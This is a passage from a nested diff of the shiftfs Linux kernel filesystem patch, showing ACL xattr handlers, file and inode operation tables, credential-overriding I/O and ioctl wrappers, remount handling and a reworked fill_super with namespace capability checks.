-+	shift_acl_xattr_ids(loweri->i_sb->s_user_ns, inode->i_sb->s_user_ns,
-+			    buffer, size);
-+	inode_unlock(loweri);
-+	return ret;
- }
- 
--static const struct xattr_handler shiftfs_xattr_handler = {
--	.prefix = "",
--	.get    = shiftfs_xattr_get,
--	.set    = shiftfs_xattr_set,
--};
-+static int
-+shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
-+			    struct dentry *dentry, struct inode *inode,
-+			    const char *name, const void *value,
-+			    size_t size, int flags)
-+{
-+	struct inode *loweri = inode->i_private;
-+	int err;
- 
--const struct xattr_handler *shiftfs_xattr_handlers[] = {
--	&shiftfs_xattr_handler,
--	NULL
--};
-+	if (!IS_POSIXACL(loweri) || !loweri->i_op->set_acl)
-+		return -EOPNOTSUPP;
-+	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
-+		return value ? -EACCES : 0;
-+	if (!inode_owner_or_capable(inode))
-+		return -EPERM;
-+
-+	if (value) {
-+		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
-+				    loweri->i_sb->s_user_ns,
-+				    (void *)value, size);
-+		err = shiftfs_setxattr(dentry, inode, handler->name, value,
-+				       size, flags);
-+	} else {
-+		err = shiftfs_removexattr(dentry, handler->name);
-+	}
- 
--static const struct super_operations shiftfs_super_ops = {
--	.put_super	= shiftfs_put_super,
--	.show_options	= shiftfs_show_options,
--	.statfs		= shiftfs_statfs,
-+	if (!err)
-+		shiftfs_copyattr(loweri, inode);
-+
-+	return err;
-+}
-+
-+static const struct xattr_handler
-+shiftfs_posix_acl_access_xattr_handler = {
-+	.name = XATTR_NAME_POSIX_ACL_ACCESS,
-+	.flags = ACL_TYPE_ACCESS,
-+	.get = shiftfs_posix_acl_xattr_get,
-+	.set = shiftfs_posix_acl_xattr_set,
- };
- 
--struct shiftfs_data {
--	void *data;
--	const char *path;
-+static const struct xattr_handler
-+shiftfs_posix_acl_default_xattr_handler = {
-+	.name = XATTR_NAME_POSIX_ACL_DEFAULT,
-+	.flags = ACL_TYPE_DEFAULT,
-+	.get = shiftfs_posix_acl_xattr_get,
-+	.set = shiftfs_posix_acl_xattr_set,
- };
- 
--static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
--			      int silent)
--{
--	struct shiftfs_data *data = raw_data;
--	char *name = kstrdup(data->path, GFP_KERNEL);
--	int err = -ENOMEM;
--	struct shiftfs_super_info *ssi = NULL;
--	struct path path;
--	struct dentry *dentry;
-+#else /* !CONFIG_SHIFT_FS_POSIX_ACL */
- 
--	if (!name)
--		goto out;
-+#define shiftfs_get_acl NULL
- 
--	ssi = kzalloc(sizeof(*ssi), GFP_KERNEL);
--	if (!ssi)
--		goto out;
-+#endif /* CONFIG_SHIFT_FS_POSIX_ACL */
- 
--	err = -EPERM;
--	err = shiftfs_parse_options(ssi, data->data);
-+static const struct inode_operations shiftfs_dir_inode_operations = {
-+	.lookup		= shiftfs_lookup,
-+	.mkdir		= shiftfs_mkdir,
-+	.symlink	= shiftfs_symlink,
-+	.unlink		= shiftfs_unlink,
-+	.rmdir		= shiftfs_rmdir,
-+	.rename		= shiftfs_rename,
-+	.link		= shiftfs_link,
-+	.setattr	= shiftfs_setattr,
-+	.create		= shiftfs_create,
-+	.mknod		= shiftfs_mknod,
-+	.permission	= shiftfs_permission,
-+	.getattr	= shiftfs_getattr,
-+	.listxattr	= shiftfs_listxattr,
-+	.get_acl	= shiftfs_get_acl,
-+};
-+
-+static const struct inode_operations shiftfs_file_inode_operations = {
-+	.fiemap		= shiftfs_fiemap,
-+	.getattr	= shiftfs_getattr,
-+	.get_acl	= shiftfs_get_acl,
-+	.listxattr	= shiftfs_listxattr,
-+	.permission	= shiftfs_permission,
-+	.setattr	= shiftfs_setattr,
-+	.tmpfile	= shiftfs_tmpfile,
-+};
-+
-+static const struct inode_operations shiftfs_special_inode_operations = {
-+	.getattr	= shiftfs_getattr,
-+	.get_acl	= shiftfs_get_acl,
-+	.listxattr	= shiftfs_listxattr,
-+	.permission	= shiftfs_permission,
-+	.setattr	= shiftfs_setattr,
-+};
-+
-+static const struct inode_operations shiftfs_symlink_inode_operations = {
-+	.getattr	= shiftfs_getattr,
-+	.get_link	= shiftfs_get_link,
-+	.listxattr	= shiftfs_listxattr,
-+	.setattr	= shiftfs_setattr,
-+};
-+
-+static struct file *shiftfs_open_realfile(const struct file *file,
-+					  struct path *realpath)
-+{
-+	struct file *lowerf;
-+	const struct cred *oldcred;
-+	struct inode *inode = file_inode(file);
-+	struct inode *loweri = realpath->dentry->d_inode;
-+	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
-+
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	/* XXX: open_with_fake_path() is not guaranteed to stay around; if
-+	 * removed, use dentry_open() */
-+	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
-+	revert_creds(oldcred);
-+
-+	return lowerf;
-+}
-+
-+#define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
-+
-+static int shiftfs_change_flags(struct file *file, unsigned int flags)
-+{
-+	struct inode *inode = file_inode(file);
-+	int err;
-+
-+	/* if some flag changed that cannot be changed then something's amiss */
-+	if (WARN_ON((file->f_flags ^ flags) & ~SHIFTFS_SETFL_MASK))
-+		return -EIO;
-+
-+	flags &= SHIFTFS_SETFL_MASK;
-+
-+	if (((flags ^ file->f_flags) & O_APPEND) && IS_APPEND(inode))
-+		return -EPERM;
-+
-+	if (flags & O_DIRECT) {
-+		if (!file->f_mapping->a_ops ||
-+		    !file->f_mapping->a_ops->direct_IO)
-+			return -EINVAL;
-+	}
-+
-+	if (file->f_op->check_flags) {
-+		err = file->f_op->check_flags(flags);
-+		if (err)
-+			return err;
-+	}
-+
-+	spin_lock(&file->f_lock);
-+	file->f_flags = (file->f_flags & ~SHIFTFS_SETFL_MASK) | flags;
-+	spin_unlock(&file->f_lock);
-+
-+	return 0;
-+}
-+
-+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
-+{
-+	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile = file_info->realfile;
-+
-+	lowerfd->flags = 0;
-+	lowerfd->file = realfile;
-+
-+	/* Did the flags change since open? */
-+	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
-+		return shiftfs_change_flags(lowerfd->file, file->f_flags);
-+
-+	return 0;
-+}
-+
-+static int shiftfs_open(struct inode *inode, struct file *file)
-+{
-+	struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info;
-+	struct shiftfs_file_info *file_info;
-+	struct file *realfile;
-+	struct path *realpath;
-+
-+	file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL);
-+	if (!file_info)
-+		return -ENOMEM;
-+
-+	realpath = &file_info->realpath;
-+	realpath->mnt = ssi->mnt;
-+	realpath->dentry = file->f_path.dentry->d_fsdata;
-+
-+	realfile = shiftfs_open_realfile(file, realpath);
-+	if (IS_ERR(realfile)) {
-+		kmem_cache_free(shiftfs_file_info_cache, file_info);
-+		return PTR_ERR(realfile);
-+	}
-+
-+	file->private_data = file_info;
-+	file_info->realfile = realfile;
-+	return 0;
-+}
-+
-+static int shiftfs_release(struct inode *inode, struct file *file)
-+{
-+	struct shiftfs_file_info *file_info = file->private_data;
-+
-+	if (file_info) {
-+		if (file_info->realfile)
-+			fput(file_info->realfile);
-+
-+		kmem_cache_free(shiftfs_file_info_cache, file_info);
-+	}
-+
-+	return 0;
-+}
-+
-+static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence)
-+{
-+	struct inode *realinode = file_inode(file)->i_private;
-+
-+	return generic_file_llseek_size(file, offset, whence,
-+					realinode->i_sb->s_maxbytes,
-+					i_size_read(realinode));
-+}
-+
-+/* XXX: Need to figure out what to do about atime updates, maybe other
-+ * timestamps too ... ref. ovl_file_accessed() */
-+
-+static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
-+{
-+	int ifl = iocb->ki_flags;
-+	rwf_t flags = 0;
-+
-+	if (ifl & IOCB_NOWAIT)
-+		flags |= RWF_NOWAIT;
-+	if (ifl & IOCB_HIPRI)
-+		flags |= RWF_HIPRI;
-+	if (ifl & IOCB_DSYNC)
-+		flags |= RWF_DSYNC;
-+	if (ifl & IOCB_SYNC)
-+		flags |= RWF_SYNC;
-+
-+	return flags;
-+}
-+
-+static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
-+{
-+	struct file *file = iocb->ki_filp;
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	ssize_t ret;
-+
-+	if (!iov_iter_count(iter))
-+		return 0;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	ret = vfs_iter_read(lowerfd.file, iter, &iocb->ki_pos,
-+			    shiftfs_iocb_to_rwf(iocb));
-+	revert_creds(oldcred);
-+
-+	shiftfs_file_accessed(file);
-+
-+	fdput(lowerfd);
-+	return ret;
-+}
-+
-+static ssize_t shiftfs_write_iter(struct kiocb *iocb, struct iov_iter *iter)
-+{
-+	struct file *file = iocb->ki_filp;
-+	struct inode *inode = file_inode(file);
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	ssize_t ret;
-+
-+	if (!iov_iter_count(iter))
-+		return 0;
-+
-+	inode_lock(inode);
-+	/* Update mode */
-+	shiftfs_copyattr(inode->i_private, inode);
-+	ret = file_remove_privs(file);
-+	if (ret)
-+		goto out_unlock;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		goto out_unlock;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	file_start_write(lowerfd.file);
-+	ret = vfs_iter_write(lowerfd.file, iter, &iocb->ki_pos,
-+			     shiftfs_iocb_to_rwf(iocb));
-+	file_end_write(lowerfd.file);
-+	revert_creds(oldcred);
-+
-+	/* Update size */
-+	shiftfs_copyattr(inode->i_private, inode);
-+
-+	fdput(lowerfd);
-+
-+out_unlock:
-+	inode_unlock(inode);
-+	return ret;
-+}
-+
-+static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
-+			 int datasync)
-+{
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	int ret;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	ret = vfs_fsync_range(lowerfd.file, start, end, datasync);
-+	revert_creds(oldcred);
-+
-+	fdput(lowerfd);
-+	return ret;
-+}
-+
-+static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
-+{
-+	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile = file_info->realfile;
-+	const struct cred *oldcred;
-+	int ret;
-+
-+	if (!realfile->f_op->mmap)
-+		return -ENODEV;
-+
-+	if (WARN_ON(file != vma->vm_file))
-+		return -EIO;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	vma->vm_file = get_file(realfile);
-+	ret = call_mmap(vma->vm_file, vma);
-+	revert_creds(oldcred);
-+
-+	shiftfs_file_accessed(file);
-+
-+	if (ret)
-+		fput(realfile); /* Drop refcount from new vm_file value */
-+	else
-+		fput(file); /* Drop refcount from previous vm_file value */
-+
-+	return ret;
-+}
-+
-+static long shiftfs_fallocate(struct file *file, int mode, loff_t offset,
-+			      loff_t len)
-+{
-+	struct inode *inode = file_inode(file);
-+	struct inode *loweri = inode->i_private;
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	int ret;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	ret = vfs_fallocate(lowerfd.file, mode, offset, len);
-+	revert_creds(oldcred);
-+
-+	/* Update size */
-+	shiftfs_copyattr(loweri, inode);
-+
-+	fdput(lowerfd);
-+	return ret;
-+}
-+
-+static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
-+			   int advice)
-+{
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	int ret;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	ret = vfs_fadvise(lowerfd.file, offset, len, advice);
-+	revert_creds(oldcred);
-+
-+	fdput(lowerfd);
-+	return ret;
-+}
-+
-+static int shiftfs_override_ioctl_creds(const struct super_block *sb,
-+					const struct cred **oldcred,
-+					struct cred **newcred)
-+{
-+	kuid_t fsuid = current_fsuid();
-+	kgid_t fsgid = current_fsgid();
-+
-+	*oldcred = shiftfs_override_creds(sb);
-+
-+	*newcred = prepare_creds();
-+	if (!*newcred) {
-+		revert_creds(*oldcred);
-+		return -ENOMEM;
-+	}
-+
-+	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
-+	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
-+
-+	/* clear all caps to prevent bypassing capable() checks */
-+	cap_clear((*newcred)->cap_bset);
-+	cap_clear((*newcred)->cap_effective);
-+	cap_clear((*newcred)->cap_inheritable);
-+	cap_clear((*newcred)->cap_permitted);
-+
-+	put_cred(override_creds(*newcred));
-+	return 0;
-+}
-+
-+static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
-+					      struct cred *newcred)
-+{
-+	return shiftfs_revert_object_creds(oldcred, newcred);
-+}
-+
-+static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
-+			       unsigned long arg)
-+{
-+	long ret = 0;
-+	struct fd lowerfd;
-+	struct cred *newcred;
-+	const struct cred *oldcred;
-+	struct super_block *sb = file->f_path.dentry->d_sb;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
-+	if (ret)
-+		goto out_fdput;
-+
-+	ret = vfs_ioctl(lowerfd.file, cmd, arg);
-+
-+	shiftfs_revert_ioctl_creds(oldcred, newcred);
-+
-+	shiftfs_copyattr(file_inode(lowerfd.file), file_inode(file));
-+	shiftfs_copyflags(file_inode(lowerfd.file), file_inode(file));
-+
-+out_fdput:
-+	fdput(lowerfd);
-+
-+	return ret;
-+}
-+
-+static long shiftfs_ioctl(struct file *file, unsigned int cmd,
-+			  unsigned long arg)
-+{
-+	switch (cmd) {
-+	case FS_IOC_GETVERSION:
-+		/* fall through */
-+	case FS_IOC_GETFLAGS:
-+		/* fall through */
-+	case FS_IOC_SETFLAGS:
-+		break;
-+	default:
-+		return -ENOTTY;
-+	}
-+
-+	return shiftfs_real_ioctl(file, cmd, arg);
-+}
-+
-+static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
-+				 unsigned long arg)
-+{
-+	switch (cmd) {
-+	case FS_IOC32_GETVERSION:
-+		/* fall through */
-+	case FS_IOC32_GETFLAGS:
-+		/* fall through */
-+	case FS_IOC32_SETFLAGS:
-+		break;
-+	default:
-+		return -ENOIOCTLCMD;
-+	}
-+
-+	return shiftfs_real_ioctl(file, cmd, arg);
-+}
-+
-+enum shiftfs_copyop {
-+	SHIFTFS_COPY,
-+	SHIFTFS_CLONE,
-+	SHIFTFS_DEDUPE,
-+};
-+
-+static ssize_t shiftfs_copyfile(struct file *file_in, loff_t pos_in,
-+				struct file *file_out, loff_t pos_out, u64 len,
-+				unsigned int flags, enum shiftfs_copyop op)
-+{
-+	ssize_t ret;
-+	struct fd real_in, real_out;
-+	const struct cred *oldcred;
-+	struct inode *inode_out = file_inode(file_out);
-+	struct inode *loweri = inode_out->i_private;
-+
-+	ret = shiftfs_real_fdget(file_out, &real_out);
-+	if (ret)
-+		return ret;
-+
-+	ret = shiftfs_real_fdget(file_in, &real_in);
-+	if (ret) {
-+		fdput(real_out);
-+		return ret;
-+	}
-+
-+	oldcred = shiftfs_override_creds(inode_out->i_sb);
-+	switch (op) {
-+	case SHIFTFS_COPY:
-+		ret = vfs_copy_file_range(real_in.file, pos_in, real_out.file,
-+					  pos_out, len, flags);
-+		break;
-+
-+	case SHIFTFS_CLONE:
-+		ret = vfs_clone_file_range(real_in.file, pos_in, real_out.file,
-+					   pos_out, len, flags);
-+		break;
-+
-+	case SHIFTFS_DEDUPE:
-+		ret = vfs_dedupe_file_range_one(real_in.file, pos_in,
-+						real_out.file, pos_out, len,
-+						flags);
-+		break;
-+	}
-+	revert_creds(oldcred);
-+
-+	/* Update size */
-+	shiftfs_copyattr(loweri, inode_out);
-+
-+	fdput(real_in);
-+	fdput(real_out);
-+
-+	return ret;
-+}
-+
-+static ssize_t shiftfs_copy_file_range(struct file *file_in, loff_t pos_in,
-+				       struct file *file_out, loff_t pos_out,
-+				       size_t len, unsigned int flags)
-+{
-+	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len, flags,
-+				SHIFTFS_COPY);
-+}
-+
-+static loff_t shiftfs_remap_file_range(struct file *file_in, loff_t pos_in,
-+				       struct file *file_out, loff_t pos_out,
-+				       loff_t len, unsigned int remap_flags)
-+{
-+	enum shiftfs_copyop op;
-+
-+	if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY))
-+		return -EINVAL;
-+
-+	if (remap_flags & REMAP_FILE_DEDUP)
-+		op = SHIFTFS_DEDUPE;
-+	else
-+		op = SHIFTFS_CLONE;
-+
-+	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len,
-+				remap_flags, op);
-+}
-+
-+static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
-+{
-+	const struct cred *oldcred;
-+	int err = -ENOTDIR;
-+	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile = file_info->realfile;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	err = iterate_dir(realfile, ctx);
-+	revert_creds(oldcred);
-+
-+	return err;
-+}
-+
-+const struct file_operations shiftfs_file_operations = {
-+	.open			= shiftfs_open,
-+	.release		= shiftfs_release,
-+	.llseek			= shiftfs_llseek,
-+	.read_iter		= shiftfs_read_iter,
-+	.write_iter		= shiftfs_write_iter,
-+	.fsync			= shiftfs_fsync,
-+	.mmap			= shiftfs_mmap,
-+	.fallocate		= shiftfs_fallocate,
-+	.fadvise		= shiftfs_fadvise,
-+	.unlocked_ioctl		= shiftfs_ioctl,
-+	.compat_ioctl		= shiftfs_compat_ioctl,
-+	.copy_file_range	= shiftfs_copy_file_range,
-+	.remap_file_range	= shiftfs_remap_file_range,
-+};
-+
-+const struct file_operations shiftfs_dir_operations = {
-+	.compat_ioctl		= shiftfs_compat_ioctl,
-+	.fsync			= shiftfs_fsync,
-+	.iterate_shared		= shiftfs_iterate_shared,
-+	.llseek			= shiftfs_llseek,
-+	.open			= shiftfs_open,
-+	.read			= generic_read_dir,
-+	.release		= shiftfs_release,
-+	.unlocked_ioctl		= shiftfs_ioctl,
-+};
-+
-+static const struct address_space_operations shiftfs_aops = {
-+	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO */
-+	.direct_IO	= noop_direct_IO,
-+};
-+
-+static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
-+			       umode_t mode, dev_t dev, struct dentry *dentry)
-+{
-+	struct inode *loweri;
-+
-+	inode->i_ino = ino;
-+	inode->i_flags |= S_NOCMTIME;
-+
-+	mode &= S_IFMT;
-+	inode->i_mode = mode;
-+	switch (mode & S_IFMT) {
-+	case S_IFDIR:
-+		inode->i_op = &shiftfs_dir_inode_operations;
-+		inode->i_fop = &shiftfs_dir_operations;
-+		break;
-+	case S_IFLNK:
-+		inode->i_op = &shiftfs_symlink_inode_operations;
-+		break;
-+	case S_IFREG:
-+		inode->i_op = &shiftfs_file_inode_operations;
-+		inode->i_fop = &shiftfs_file_operations;
-+		inode->i_mapping->a_ops = &shiftfs_aops;
-+		break;
-+	default:
-+		inode->i_op = &shiftfs_special_inode_operations;
-+		init_special_inode(inode, mode, dev);
-+		break;
-+	}
-+
-+	if (!dentry)
-+		return;
-+
-+	loweri = dentry->d_inode;
-+	if (!loweri->i_op->get_link)
-+		inode->i_opflags |= IOP_NOFOLLOW;
-+
-+	shiftfs_copyattr(loweri, inode);
-+	shiftfs_copyflags(loweri, inode);
-+	set_nlink(inode, loweri->i_nlink);
-+}
-+
-+static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
-+{
-+	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
-+
-+	if (sbinfo->mark)
-+		seq_show_option(m, "mark", NULL);
-+
-+	if (sbinfo->passthrough)
-+		seq_printf(m, ",passthrough=%u", sbinfo->passthrough);
-+
-+	return 0;
-+}
-+
-+static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
-+{
-+	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
-+	struct dentry *root = sb->s_root;
-+	struct dentry *realroot = root->d_fsdata;
-+	struct path realpath = { .mnt = sbinfo->mnt, .dentry = realroot };
-+	int err;
-+
-+	err = vfs_statfs(&realpath, buf);
- 	if (err)
--		goto out;
-+		return err;
- 
--	/* to mark a mount point, must be real root */
--	if (ssi->mark && !capable(CAP_SYS_ADMIN))
--		goto out;
-+	if (!shiftfs_passthrough_statfs(sbinfo))
-+		buf->f_type = sb->s_magic;
- 
--	/* else to mount a mark, must be userns admin */
--	if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
--		goto out;
-+	return 0;
-+}
- 
--	err = kern_path(name, LOOKUP_FOLLOW, &path);
-+static void shiftfs_evict_inode(struct inode *inode)
-+{
-+	struct inode *loweri = inode->i_private;
-+
-+	clear_inode(inode);
-+
-+	if (loweri)
-+		iput(loweri);
-+}
-+
-+static void shiftfs_put_super(struct super_block *sb)
-+{
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
-+
-+	if (sbinfo) {
-+		mntput(sbinfo->mnt);
-+		put_cred(sbinfo->creator_cred);
-+		kfree(sbinfo);
-+	}
-+}
-+
-+static const struct xattr_handler shiftfs_xattr_handler = {
-+	.prefix = "",
-+	.get    = shiftfs_xattr_get,
-+	.set    = shiftfs_xattr_set,
-+};
-+
-+const struct xattr_handler *shiftfs_xattr_handlers[] = {
-+#ifdef CONFIG_SHIFT_FS_POSIX_ACL
-+	&shiftfs_posix_acl_access_xattr_handler,
-+	&shiftfs_posix_acl_default_xattr_handler,
-+#endif
-+	&shiftfs_xattr_handler,
-+	NULL
-+};
-+
-+static inline bool passthrough_is_subset(int old_flags, int new_flags)
-+{
-+	if ((new_flags & old_flags) != new_flags)
-+		return false;
-+
-+	return true;
-+}
-+
-+static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
-+{
-+	int err;
-+	struct shiftfs_super_info new = {};
-+	struct shiftfs_super_info *info = sb->s_fs_info;
-+
-+	err = shiftfs_parse_mount_options(&new, data);
- 	if (err)
--		goto out;
-+		return err;
-+
-+	/* Mark mount option cannot be changed. */
-+	if (info->mark || (info->mark != new.mark))
-+		return -EPERM;
-+
-+	if (info->passthrough != new.passthrough) {
-+		/* Don't allow exceeding passthrough options of mark mount. */
-+		if (!passthrough_is_subset(info->info_mark->passthrough,
-+					   info->passthrough))
-+			return -EPERM;
-+
-+		info->passthrough = new.passthrough;
-+	}
-+
-+	return 0;
-+}
- 
--	err = -EPERM;
-+static const struct super_operations shiftfs_super_ops = {
-+	.put_super	= shiftfs_put_super,
-+	.show_options	= shiftfs_show_options,
-+	.statfs		= shiftfs_statfs,
-+	.remount_fs	= shiftfs_remount,
-+	.evict_inode	= shiftfs_evict_inode,
-+};
-+
-+struct shiftfs_data {
-+	void *data;
-+	const char *path;
-+};
-+
-+static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
-+			      int silent)
-+{
-+	int err;
-+	struct path path = {};
-+	struct shiftfs_super_info *sbinfo_mp;
-+	char *name = NULL;
-+	struct inode *inode = NULL;
-+	struct dentry *dentry = NULL;
-+	struct shiftfs_data *data = raw_data;
-+	struct shiftfs_super_info *sbinfo = NULL;
-+
-+	if (!data->path)
-+		return -EINVAL;
-+
-+	sb->s_fs_info = kzalloc(sizeof(*sbinfo), GFP_KERNEL);
-+	if (!sb->s_fs_info)
-+		return -ENOMEM;
-+	sbinfo = sb->s_fs_info;
-+
-+	err = shiftfs_parse_mount_options(sbinfo, data->data);
-+	if (err)
-+		return err;
-+
-+	/* to mount a mark, must be userns admin */
-+	if (!sbinfo->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
-+		return -EPERM;
-+
-+	name = kstrdup(data->path, GFP_KERNEL);
-+	if (!name)
-+		return -ENOMEM;
-+
-+	err = kern_path(name, LOOKUP_FOLLOW, &path);
-+	if (err)
-+		goto out_free_name;
- 
- 	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
- 		err = -ENOTDIR;
--		goto out_put;
-+		goto out_put_path;
- 	}
- 
--	sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
--	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
--		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
--		err = -EINVAL;
--		goto out_put;
--	}
-+	if (sbinfo->mark) {
-+		struct super_block *lower_sb = path.mnt->mnt_sb;
-+
-+		/* to mark a mount point, must root wrt lower s_user_ns */
-+		if (!ns_capable(lower_sb->s_user_ns, CAP_SYS_ADMIN)) {
-+			err = -EPERM;
-+			goto out_put_path;
-+		}
- 
--	if (ssi->mark) {
- 		/*
- 		 * this part is visible unshifted, so make sure no
- 		 * executables can be used to gain suid
- 		 * privileges
- 		 */
- 		sb->s_iflags = SB_I_NOEXEC;
--		ssi->mnt = path.mnt;
--		dentry = path.dentry;
--	} else {
--		struct shiftfs_super_info *mp_ssi;
- 
- 		/*
--		 * this leg executes if we're admin capable in
--		 * the namespace, so be very careful
-+		 * Handle nesting of shiftfs mounts by referring this mark
-+		 * mount back to the original mark mount. This is more
-+		 * efficient and alleviates concerns about stack depth.
- 		 */
-+		if (lower_sb->s_magic == SHIFTFS_MAGIC) {
-+			sbinfo_mp = lower_sb->s_fs_info;
-+
-+			/* Doesn't make sense to mark a mark mount */
-+			if (sbinfo_mp->mark) {
-+				err = -EINVAL;
-+				goto out_put_path;
-+			}
-+
-+			if (!passthrough_is_subset(sbinfo_mp->passthrough,
-+						   sbinfo->passthrough)) {
-+				err = -EPERM;
-+				goto out_put_path;
-+			}
-+
-+			sbinfo->mnt = mntget(sbinfo_mp->mnt);
-+			dentry = dget(path.dentry->d_fsdata);
-+		} else {
-+			sbinfo->mnt = mntget(path.mnt);
-+			dentry = dget(path.dentry);
-+		}
-+
-+		sbinfo->creator_cred = prepare_creds();
-+		if (!sbinfo->creator_cred) {
-+			err = -ENOMEM;
-+			goto out_put_path;
-+		}
-+	} else {
-+		/*
-+		 * This leg executes if we're admin capable in the namespace,
-+		 * so be very careful.
-+		 */
-+		err = -EPERM;
- 		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
--			goto out_put;
--		mp_ssi = path.dentry->d_sb->s_fs_info;
--		if (!mp_ssi->mark)
--			goto out_put;
--		ssi->mnt = mntget(mp_ssi->mnt);
-+			goto out_put_path;
-+
-+		sbinfo_mp = path.dentry->d_sb->s_fs_info;
-+		if (!sbinfo_mp->mark)
-+			goto out_put_path;
-+
-+		if (!passthrough_is_subset(sbinfo_mp->passthrough,
-+					   sbinfo->passthrough))
-+			goto out_put_path;
-+
-+		sbinfo->mnt = mntget(sbinfo_mp->mnt);
-+		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
- 		dentry = dget(path.dentry->d_fsdata);
--		path_put(&path);
-+		sbinfo->info_mark = sbinfo_mp;
-+	}
-+
-+	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
-+	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
-+		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
-+		err = -EINVAL;
-+		goto out_put_path;
-+	}
-+
-+	inode = new_inode(sb);
-+	if (!inode) {
-+		err = -ENOMEM;
-+		goto out_put_path;
- 	}
--	ssi->userns = get_user_ns(dentry->d_sb->s_user_ns);
--	sb->s_fs_info = ssi;
-+	shiftfs_fill_inode(inode, dentry->d_inode->i_ino, S_IFDIR, 0, dentry);
-+
-+	ihold(dentry->d_inode);
-+	inode->i_private = dentry->d_inode;
-+
- 	sb->s_magic = SHIFTFS_MAGIC;
- 	sb->s_op = &shiftfs_super_ops;
- 	sb->s_xattr = shiftfs_xattr_handlers;
- 	sb->s_d_op = &shiftfs_dentry_ops;
--	sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry));
-+	sb->s_flags |= SB_POSIXACL;
-+	sb->s_root = d_make_root(inode);
-+	if (!sb->s_root) {
-+		err = -ENOMEM;
-+		goto out_put_path;
-+	}
-+
- 	sb->s_root->d_fsdata = dentry;
-+	sbinfo->userns = get_user_ns(dentry->d_sb->s_user_ns);
-+	shiftfs_copyattr(dentry->d_inode, sb->s_root->d_inode);
- 
--	return 0;
-+	dentry = NULL;
-+	err = 0;
- 
-- out_put:
-+out_put_path:
- 	path_put(&path);
-- out:
-+
-+out_free_name:
- 	kfree(name);
--	kfree(ssi);
-+
-+	dput(dentry);
-+
- 	return err;
- }
- 
-@@ -764,17 +1869,26 @@ static struct file_system_type shiftfs_type = {
- 
- static int __init shiftfs_init(void)
- {
-+	shiftfs_file_info_cache = kmem_cache_create(
